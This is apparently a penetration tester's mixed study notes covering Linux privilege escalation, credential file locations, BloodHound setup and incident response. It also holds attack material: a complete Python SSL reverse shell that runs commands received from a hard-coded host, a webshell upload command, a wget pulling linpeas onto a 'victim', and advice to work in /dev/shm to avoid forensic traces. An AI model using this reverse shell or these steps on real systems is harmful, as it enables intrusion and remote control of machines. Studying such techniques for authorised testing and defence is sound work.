Nmap only supports ethernet interfaces (including most 802.11 wireless cards and many VPN clients) for raw packet scans. Unless you use the -sT -Pn options, RAS connections (such as PPP dialups) and certain VPN clients are not supported. This support was dropped when Microsoft removed raw TCP/IP socket support in Windows XP SP2. Now Nmap must send lower-level ethernet frames instead.

VPN issues

https://nmap.org/book/inst-windows.html

Dorking

cache:[url] Shows the version of the web page from the search engine’s cache.
related:[url] Finds web pages that are similar to the specified web page.
info:[url] Presents some information that Google has about a web page, including similar pages, the cached version of the page, and sites linking to the page.
site:[url] Finds pages only within a particular domain and all its subdomains.
intitle:[text] or allintitle:[text] Finds pages that include a specific keyword as part of the indexed title tag. You must include a space between the colon and the query for the operator to work in Bing.
allinurl:[text] Finds pages that include a specific keyword as part of their indexed URLs.
meta:[text] Finds pages that contain the specific keyword in the meta tags.
filetype:[file extension] Searches for specific file types.
intext:[text], allintext:[text], inbody:[text] Searches text of page. For Bing and Yahoo the query is inbody:[text]. For DuckDuckGo the query is intext:[text]. For Google either intext:[text] or allintext:[text] can be used.
inanchor:[text] Search link anchor text
location:[iso code] or loc:[iso code], region:[region code] Search for a specific region. For Bing use location:[iso code] or loc:[iso code] and for DuckDuckGo use region:[iso code]. An ISO location code is a short code for a country, for example Egypt is eg and USA is us. https://en.wikipedia.org/wiki/ISO_3166-1
contains:[text] Identifies sites that contain links to filetypes specified (i.e. contains:pdf)
altloc:[iso code] Searches for location in addition to one specified by language of site (i.e. pt-us or en-us)
feed:[feed type, i.e. rss] Find RSS feed related to search term
hasfeed:[url] Finds webpages that contain both the term or terms for which you are querying and one or more RSS or Atom feeds.
ip:[ip address] Find sites hosted by a specific ip address
language:[language code] Returns websites that match the search term in a specified language
book:[title] Searches for book titles related to keywords
maps:[location] Searches for maps related to keywords
linkfromdomain:[url] Shows websites whose links are mentioned in the specified url (with errors)
https://securitytrails.com/blog/google-hacking-techniques

Linux Privesc

Use linpeas to identify avenues to escalate privileges in Linux. Linpeas must be served to the victim machine from a python3 HTTP server or similar. To pull linpeas from your attacking machine onto the victim, use wget. Example: wget 10.6.114.53:9999/linpeas.sh. This command pulls the “linpeas.sh” file from the hosting server.

* GTFOBins
GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems. The project collects legitimate functions of Unix binaries that can be abused to break out of restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate other post-exploitation tasks.


Find the SUID files
The following command will list all of the SUID files in the system
find / -perm -u=s -type f 2>/dev/null

Find Processes running as root 
ps aux | grep root 

See logged in users
ps au

Can the user run anything as another user?
sudo -l

Check for unmounted file systems/drives
`lsblk`


source: https://safe.menlosecurity.com/https://pentest.coffee/linux-privilege-escalation-for-oscp-and-beyond-cheat-sheet-24fb9fe13058

list of config files, logfiles that could contain cleartext passwords

System Configuration Files

/etc/passwd: Historically used for storing passwords, though modern systems use it for account information and store hashed passwords in /etc/shadow.
/etc/shadow: Stores password hashes, but misconfigurations or weak hashing can lead to vulnerabilities.
/etc/group: Similar to /etc/passwd, but for group information.
/etc/gshadow: Group password hashes, similar to /etc/shadow.

Application and Service Configuration Files

Web Server Config Files: Files like Apache's httpd.conf or Nginx's nginx.conf and associated site configuration files.
Database Config Files: Such as MySQL's my.cnf, PostgreSQL's pg_hba.conf, or similar files for other database systems.
Application-specific Config Files: Files like config.php (for PHP apps), settings.py (for Django apps), .env files, or other application configuration files.
FTP and SSH Config Files: Files like vsftpd.conf for vsFTPd or SSH daemon config files (sshd_config) might contain passwords for certain configurations.
VPN Config Files: For instance, OpenVPN configuration files (openvpn.conf) might include credentials.

User Home Directories

Shell Configuration and History Files: Files like .bashrc, .bash_history, .zshrc, .zsh_history, etc., may contain inadvertently stored passwords or sensitive commands.
.netrc: Used by FTP and other network clients to store credentials.
SSH Keys: Not clear-text passwords, but files like id_rsa in .ssh can be critical.

System and Application Log Files

Web Server Logs: (/var/log/apache2/access.log, /var/log/nginx/access.log, etc.) might inadvertently contain credentials passed through URLs or in POST requests.
Database Logs: SQL query logs could contain plain text credentials, especially in verbose logging modes.
Application Logs: Depending on the application, logs (/var/log/app_name/) might include sensitive information.
System Logs: (/var/log/syslog, /var/log/auth.log) can sometimes contain sensitive information, depending on the system activities and log configuration.

Miscellaneous Files

Cron Job Files: (/etc/crontab, /var/spool/cron/crontabs/) might contain scripts with embedded credentials.
Backup Files: Such as .bak, .old, files containing previous versions of configuration files.
.git Configuration Files: Repositories with configuration files or code that might contain hard-coded credentials.

Additional Places

.git Configuration: Repositories with stored credentials in configuration or code files.
Backup Files: Such as .bak, .old, .tmp, which might contain older versions of config files with passwords.
SSH Keys and Configurations: While not clear-text passwords, private SSH keys (id_rsa) are often equivalent to passwords and should be secured similarly.
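As an added illustration (not part of the original notes), a small audit script that scans the kinds of files listed above for cleartext credentials and reports each hit redacted, so the secret can be rotated rather than copied around. The regex patterns and the sample file contents are constructed assumptions for this example; on a real host you would read the actual paths instead.

```python
import re
from collections import namedtuple

# Patterns that commonly indicate a cleartext secret in a config or log line
# (assumptions for this example; tune them for your own environment).
SECRET_PATTERNS = [
    # key = value / key: "value" forms in config files and .env files
    re.compile(r"(?i)\b(password|passwd|pwd|secret|api[_-]?key|token)\s*[=:]\s*['\"]?([^'\"\s;&]+)"),
    # user:password@host embedded in connection URLs
    re.compile(r"://[^/\s:@]+:([^@/\s]+)@"),
]

Finding = namedtuple("Finding", "path lineno redacted")

def redact(secret):
    """Keep only the first and last character so the report itself does not leak the value."""
    if len(secret) <= 2:
        return "*" * len(secret)
    return secret[0] + "*" * (len(secret) - 2) + secret[-1]

def scan_lines(path, lines):
    """Return one Finding per line that looks like it carries a cleartext credential."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        for pat in SECRET_PATTERNS:
            m = pat.search(line)
            if m:
                findings.append(Finding(path, lineno, redact(m.group(m.lastindex))))
                break
    return findings

# Constructed sample contents standing in for the real files listed above.
SAMPLE_FILES = {
    "/etc/mysql/my.cnf": ["[client]", "user = app", "password = Sup3rS3cret!"],
    "/var/www/app/.env": ["APP_ENV=production",
                          "DB_URL=mysql://app:Sup3rS3cret!@db.internal/app",
                          'API_KEY="ak_live_0123456789"'],
    "/var/log/nginx/access.log": [
        '10.0.0.5 - - [21/Oct/2024:20:57:11 +0000] "GET /login?user=bob&password=hunter2 HTTP/1.1" 200 512',
        '10.0.0.6 - - [21/Oct/2024:20:58:02 +0000] "GET /index.html HTTP/1.1" 200 1024',
    ],
}

def audit(files=SAMPLE_FILES):
    """Scan every sample file; on a real host read the listed paths instead."""
    results = []
    for path, lines in files.items():
        results.extend(scan_lines(path, lines))
    return results

if __name__ == "__main__":
    for f in audit():
        print(f"{f.path}:{f.lineno}: possible cleartext credential {f.redacted} -> rotate it")
```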

Mac OS

Look into /var/logs/ 

STEALTH

/dev/shm

Use the directory /dev/shm to work out of to avoid writing files to the disk. This is a virtual directory that only exists in memory. Any files left behind here will be wiped when the system shuts down or restarts.

Questions:

Change stolen ssh keys to read only?

MISC

Windows stores its hosts file (equivalent to /etc/hosts) at C:\Windows\System32\drivers\etc\hosts.

Password Cracking

Basic Usage

WELCOME TO SETTING UP A BLOODHOUND ENVIRONMENT

The purpose of this is to enumerate the environment without needing to "own" a domain-joined device within the network for an internal assessment.

Dependencies

  1. Neo4j
  2. Bloodhound
  3. impacket
  4. ldap3
  5. dnspython

Bloodhound-Python requires:

  1. Domain login credentials
  2. Visibility towards a Domain Controller

Neo4j - this package comes included with Kali OVA distros as well as the Kali ISO.

If not - https://installati.one/kalilinux/neo4j/

Run the following commands:

    sudo apt-get update
    sudo apt-get -y install neo4j

OR

    sudo apt update
    sudo apt -y install neo4j

After installation is complete, run the following command:

    sudo neo4j console

This will start up the neo4j database locally on your host.

Navigate to http://localhost:7474/ and use the default login of neo4j / neo4j. This will ask you to change your password; feel free to change it to whatever you would like.

Finally, leave the instance running within a terminal tab.

Bloodhound - this tool comes included with Kali OVA distros as well as the Kali ISO.

If not - https://www.kali.org/tools/bloodhound/

Run the following command:

    sudo apt install bloodhound

After installation is complete, run bloodhound. A GUI window with a login screen will appear. Use the neo4j credentials you changed earlier in the neo4j setup.

Bloodhound-Python - this tool will NOT come included with Kali. You will have to navigate to https://github.com/fox-it/BloodHound.py

Installation - read the README.md carefully.

BloodHound.py requires impacket, ldap3 and dnspython. This can be done with:

    sudo pip3 install bloodhound

This will install all requirements.

After installation you will need to have domain credentials already owned, already be internally in the network, and be able to "see" a domain controller.

If all pre-reqs are met, run the following command (note the two dashes on --disable-autogc):

    bloodhound-python -u <user> -p <password> -dc <domain controller> --disable-autogc -d <domain>

Feel free to add '-c all' to the end of the command if you wish to use more than just LDAP to gather more information about the domain.

This will create all json files within your current working directory.

Finally, navigate back to your Bloodhound GUI.

Go to the "Upload Data" button on the right hand side.

Navigate to the json files that bloodhound-python created and click "Open".

Allow Bloodhound to process your json files.

Once all json files have been processed you should be able to run the pre-built queries to see a nice visual view of the environment.

CrackMapExec

PowerSploit

Incognito - token impersonation

Azure

Webshells

Cmd.aspx is a webshell. Reference: HTB box revel.

put /usr/share/webshells/aspx/cmdasp.aspx c.aspx

SSL reverse shell python

import os
import socket
import subprocess
import ssl

# Create a socket (host and port are the script's hard-coded listener address)
def socket_create():
    try:
        global host
        global port
        global ssls
        global s
        host = '10.1.1.1'
        port = 8443
        s = socket.socket()
        # ssl.wrap_socket() was removed in Python 3.12 and PROTOCOL_TLSv1 is
        # deprecated; an SSLContext gives the same unverified client-side TLS.
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        ssls = ctx.wrap_socket(s)
    except socket.error as msg:
        print('Socket creation error: ' + str(msg))

# Connect to a remote socket
def socket_connect():
    try:
        ssls.connect((host, port))
        ssls.send(str.encode(str(os.getcwd()) + ' > '))
    except socket.error as msg:
        print('Socket connection error: ' + str(msg))

# Receive commands from remote server and run on local machine
def receive_commands():
    while True:
        data = ssls.recv(1024)
        if not data:  # an empty read means the peer closed the connection
            break
        data = data.decode("utf-8", errors="replace").strip()
        print('Received: ' + data)
        if data[:2] == 'cd':
            os.chdir(data[3:])
            ssls.send(str.encode(str(os.getcwd()) + ' > '))
        elif len(data) > 0:
            cmd = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE,
                                   stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            # communicate() drains both pipes together, avoiding the deadlock
            # that reading stdout to completion before stderr can cause
            out, err = cmd.communicate()
            output_str = (out + err).decode("utf-8", errors="replace")
            ssls.send(str.encode(output_str + str(os.getcwd()) + ' > '))
            if len(output_str.split('\n')) > 2:
                nL = 2
            else:
                nL = 0
            print('Sent: ' + nL * '\n' + output_str)
    ssls.close()

def main():
    socket_create()
    socket_connect()
    receive_commands()

if __name__ == '__main__':
    main()

CODING

C

Variables - numbers, characters, text, decimal numbers, etc. int = integer; just type out the number, no decimals. double = decimal number. float = decimal number. char = one single character in single quotes, for example 'A'. To create a string of characters use [].

To store a character use char. Example usage of char: char variablename = 'G'; To store multiple characters in one char variable, like a name, use []: char variablename [] = "lewis";

To store whole numbers (integers) use int. Example: int samplenumber = 35;

Variables can be printed with printf using the percent sign % followed by the letter that corresponds to the type of data you are trying to represent (%s for a string, %d for an int).

Example:

#include <stdio.h>

int main () {
    char variablename [] = "lewis";
    int samplenumber = 35;
    printf ("%s is a man. \n", variablename);
    printf ("lewis is %d years old. \n", samplenumber);
    return 0;
}

Method (called a function in C) - a container where you can put code. ";" ends an instruction. "\n" is a new line. "\" (backslash) escapes characters; for instance, if you wanted to print a special character, use it to escape it. Example of the printf function: printf ("There once was a man named george \n");

Red Teaming

Sample attack chain

  • Initial access through phishing
  • Kerberoast
  • DCSync
  • Dump registry

Phase mapping:

  • Gain access - Initial access, Defense evasion, C2E
  • Establish foothold - Persistence, Discovery
  • Obtain privs - Credential access, privesc, lateral movement

Defense evasion

  • Process injection / Process hollowing
  • Freeze framework

Living off the land

Tpmtool - Tool can be used 

Batch files for redteaming

ProcMon - https://gist.github.com/egre55/1df7db9c13648097f997432019f4a8e1

Pivoting, lateral movement

chisel - https://www.youtube.com/watch?v=pbR_BNSOaMk

Golden Image testing

Attacking and Defending AWS, Azure and GCP Apps + Kubernetes + Docker


Incident Response

# Preparation
Policy Development
Plan Creation
Team Formation
Tools and Resources
Training
Legal and Compliance Review
Integration with Business Continuity

# Detection
Monitoring
Detection Engineering
Threat Hunting
Threat Intelligence
Anomaly Detection
Security Assessment

# Triage
Severity Assessment
Incident Categorization
Escalation
Stakeholder Communication
Resource Allocation

# Containment
Network Isolation
Logical Access Isolation
Forensics Automation
Communication with Affected Parties
Patch Management
Resource Disablement

# Analysis
Data Collection
Forensic Analysis
Log Analysis
Root Cause Analysis
Timeline Reconstruction
Security Posture Assessment

# Remediation
Patch Management
Credential Reset
Threat Eradication
Configuration Changes
Security Enhancements
Hardening
Documentation

# Recovery
# Post-Incident Activity

Incident response is a structured approach used to manage and address security breaches, cyberattacks, or other threats to an organization’s systems and data. The goal is to effectively manage the situation to minimize damage, reduce recovery time, and mitigate any future risk. The incident response process generally follows a cycle of well-defined principles and stages.

  1. Preparation

Preparation is the first principle and is critical to ensuring that an organization can handle security incidents effectively. The better prepared you are, the quicker you can respond. This includes:

  • Developing an Incident Response Plan: A documented procedure detailing how incidents will be identified, reported, and managed.
  • Establishing a Response Team: A dedicated team trained to handle security incidents (usually called the Computer Security Incident Response Team, or CSIRT).
  • Training: Regularly training staff on security policies and awareness.
  • Tools and Resources: Ensuring the right tools (e.g., detection systems, logging tools) and resources are in place.

  2. Identification

In this phase, the goal is to detect and accurately determine whether an incident has occurred. Identification involves:

  • Monitoring Systems: Continuously monitoring network traffic, endpoints, and logs to identify suspicious activities.
  • Initial Assessment: Once a potential incident is identified, it must be assessed to confirm whether it is an actual security incident.
  • Classifying the Incident: Determining the type, severity, and impact of the incident. This helps prioritize how the response should proceed.

  3. Containment

Once an incident is identified, the first priority is to contain it to prevent further damage. Containment can be split into two phases:

  • Short-term Containment: Implementing measures to stop the spread or impact of the attack. This could involve isolating compromised systems, closing off certain network segments, or disabling user accounts.
  • Long-term Containment: Ensuring that affected systems are securely restored. This could involve applying security patches, making system backups, or preparing for full system recovery while preserving forensic evidence.

  4. Eradication

After containment, the next step is to remove the root cause of the incident. Eradication involves:

  • Eliminating the Threat: Removing malware, cleaning up infected systems, and closing exploited vulnerabilities.
  • Verification: Ensuring that the threat has been fully removed, by scanning systems and reviewing logs to check for any remaining traces of the attacker or malware.

  5. Recovery

Once the incident has been contained and eradicated, it's time to restore and validate the systems affected. The recovery phase includes:

  • Restoring Systems: Bringing systems back online safely, ensuring they are clean and secure.
  • Testing: Verifying that systems are functioning normally and that there are no signs of reinfection or vulnerabilities.
  • Monitoring: Closely monitoring systems to detect any abnormal behavior or potential follow-up attacks after recovery.

  6. Lessons Learned

After the incident has been resolved, it's essential to review what happened, how it was handled, and how the organization can improve its defenses in the future. This phase involves:

  • Post-Incident Review: Conducting a meeting with the incident response team and stakeholders to go over what happened, what worked well, and what didn't.
  • Documenting the Incident: Writing an incident report that details the incident, including timelines, actions taken, and lessons learned.
  • Improving the Incident Response Plan: Updating policies, procedures, and security controls based on the incident review to improve future responses.

Key Principles of Incident Response:

  • Speed and Efficiency: Respond as quickly as possible to minimize damage and disruption.
  • Containment over Eradication: Contain first to prevent the spread of damage, then focus on eliminating the threat.
  • Documentation: Document everything throughout the process to maintain a clear record for analysis and potential legal or compliance requirements.
  • Communication: Clear, consistent communication between the incident response team, stakeholders, and external parties (e.g., legal teams or law enforcement).
  • Continuous Improvement: Every incident should provide insights to improve future incident response strategies and reduce vulnerabilities.


Common Cloud Attack Approach

Adversary gains a foothold into the account through compromised credentials:

  • User credentials => AWS Access Key and Secret Key
  • Service Tokens => AWS Access Key, Secret Key and Session Token

The adversary then leverages the credentials to escalate privileges and performs one or more techniques, depending on objective, configuration and so on.

Kubernetes + Docker


How to develop persistence in AWS and other cloud platforms ?

Dockerscan is a tool that can be used to get a reverse shell out of a Docker image. It uses LD_PRELOAD to add commands to the image, so an LD_PRELOAD entry being present in an image is a sign that it may be compromised. LD_PRELOAD is an additional instruction to the dynamic loader that makes the image execute an extra process, in this case a reverse shell.
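As an added defender-side example (not part of the original notes or of Dockerscan), a check that looks for the two places such a preload can live: an LD_PRELOAD variable in the image config's environment, and an /etc/ld.so.preload file inside a layer. The image config layout (a "config" object with an "Env" list), the layer tar and the library path are constructed assumptions for this example.

```python
import io
import tarfile

# Constructed sample of an OCI-style image config; not taken from a real image.
SAMPLE_IMAGE_CONFIG = {
    "config": {
        "Env": ["PATH=/usr/local/sbin:/usr/local/bin:/usr/bin",
                "LD_PRELOAD=/usr/lib/libhook.so"],
        "Cmd": ["/bin/sh"],
    },
}

def build_sample_layer():
    """Build an in-memory layer tar that ships /etc/ld.so.preload (constructed sample)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, content in [("etc/ld.so.preload", b"/usr/lib/libhook.so\n"),
                              ("etc/hostname", b"web\n")]:
            info = tarfile.TarInfo(name)
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()

def check_env(config):
    """Return every LD_PRELOAD assignment in the image's environment."""
    env = config.get("config", {}).get("Env") or []
    return [e for e in env if e.split("=", 1)[0] == "LD_PRELOAD"]

def check_layer(layer_bytes):
    """Return (path, libraries) for any /etc/ld.so.preload file found in a layer tar."""
    hits = []
    with tarfile.open(fileobj=io.BytesIO(layer_bytes), mode="r") as tar:
        for member in tar.getmembers():
            if member.isfile() and member.name.lstrip("./") == "etc/ld.so.preload":
                libs = tar.extractfile(member).read().decode(errors="replace").split()
                hits.append((member.name, libs))
    return hits

def audit_image(config, layers):
    """Combine both checks into a list of human-readable findings."""
    findings = ["env sets " + e for e in check_env(config)]
    for idx, layer in enumerate(layers):
        for name, libs in check_layer(layer):
            findings.append(f"layer {idx} ships {name} preloading {', '.join(libs)}")
    return findings

if __name__ == "__main__":
    for finding in audit_image(SAMPLE_IMAGE_CONFIG, [build_sample_layer()]):
        print("suspicious:", finding)
```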

https://github.com/aquasecurity/trivy - Trivy is a comprehensive and versatile security scanner. Trivy has scanners that look for security issues, and targets where it can find those issues.

Targets (what Trivy can scan):

  • Container Image
  • Filesystem
  • Git Repository (remote)
  • Virtual Machine Image
  • Kubernetes
  • AWS

Kubernetes forensics

  • kubeshark
  • hubble

7-October-24 class Questions:

Layered file system? Union mounting

Phones

iOS

Unzip an ipa: unzip app.ipa -d app

Android

Fun Facts

  • AWS WAF, in addition to many other WAFs based on the ModSecurity WAF, only inspects 8 KB of data per payload.
  • Microsoft Teams installs its application files in the user's local profile folder, the %LocalAppData%\Microsoft\Teams directory within each user's profile. This per-user installation approach allows Teams to update itself without requiring administrative privileges.
